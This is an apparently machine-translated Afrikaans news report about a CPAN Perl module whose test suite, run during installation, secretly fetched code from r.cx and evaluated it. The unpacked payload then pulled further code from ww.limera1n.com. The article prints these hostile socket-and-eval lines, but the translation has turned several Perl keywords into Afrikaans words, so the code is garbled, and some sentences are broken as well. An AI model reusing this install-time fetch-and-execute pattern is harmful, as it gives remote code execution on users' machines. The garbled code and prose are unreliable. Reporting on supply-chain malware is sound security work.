In 'n Perl-pakket versprei deur die CPAN-gids , ontwerp om CPAN-modules outomaties te laai, kwaadwillige kode. Die kwaadwillige insetsel was in die toetskode , wat sedert 2011 gestuur word.
Dit is opmerklik dat vrae oor die laai van twyfelagtige kode ontstaan het terug in 2016.
Kwaadwillige aktiwiteit kom neer op 'n poging om kode van 'n derdeparty-bediener (http://r.cx:1/) af te laai en uit te voer tydens die uitvoering van 'n toetssuite wat geloods is tydens die installering van die module. Daar word aanvaar dat die kode wat aanvanklik van die eksterne bediener afgelaai is nie kwaadwillig was nie, maar nou word die versoek herlei na die ww.limera1n.com-domein, wat sy gedeelte van die kode vir uitvoering verskaf.
Om die aflaai in 'n lêer te organiseer Die volgende kode word gebruik:
my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
Die gespesifiseerde kode veroorsaak dat die skrip uitgevoer word , waarvan die inhoud gereduseer word tot die reël:
gebruik lib do{eval<$b>&&botstrap("RCX")if$b=nuwe IO::Socket::INET 82.46.99.88.":1″};
Hierdie skrif laai die diens te gebruik kode van die eksterne gasheer r.cx (karakterkodes 82.46.99.88 stem ooreen met die teks "R.cX") en voer dit in die evalblok uit.
$ perl -MIO::Socket -e'$b=nuwe IO::Socket::INET 82.46.99.88.":1″; druk <$b>;'
eval pak u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
Na uitpak word die volgende uiteindelik uitgevoer: :
print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1
Die problematiese pakket is nou uit die bewaarplek verwyder. (Perl Authors Upload Server), en die module outeur se rekening is geblokkeer. In hierdie geval bly die module steeds oor in die MetaCPAN-argief en kan direk vanaf MetaCPAN geïnstalleer word deur sommige nutsprogramme soos cpanminus te gebruik. dat die pakket nie wyd versprei is nie.
Interessant om te bespreek en die skrywer van die module, wat die inligting ontken het dat kwaadwillige kode ingevoeg is nadat sy webwerf "r.cx" gekap is en verduidelik het dat hy net pret gehad het, en perlobfuscator.com gebruik het om nie iets weg te steek nie, maar om die grootte te verklein. van die kode en vereenvoudig die kopiëring daarvan via die knipbord. Die keuse van die funksienaam "botstrap" word verklaar deur die feit dat hierdie woord "soos bot klink en korter is as bootstrap." Die skrywer van die module het ook verseker dat die geïdentifiseerde manipulasies nie kwaadwillige aksies uitvoer nie, maar slegs die laai en uitvoer van kode via TCP demonstreer.
Bron: opennet.ru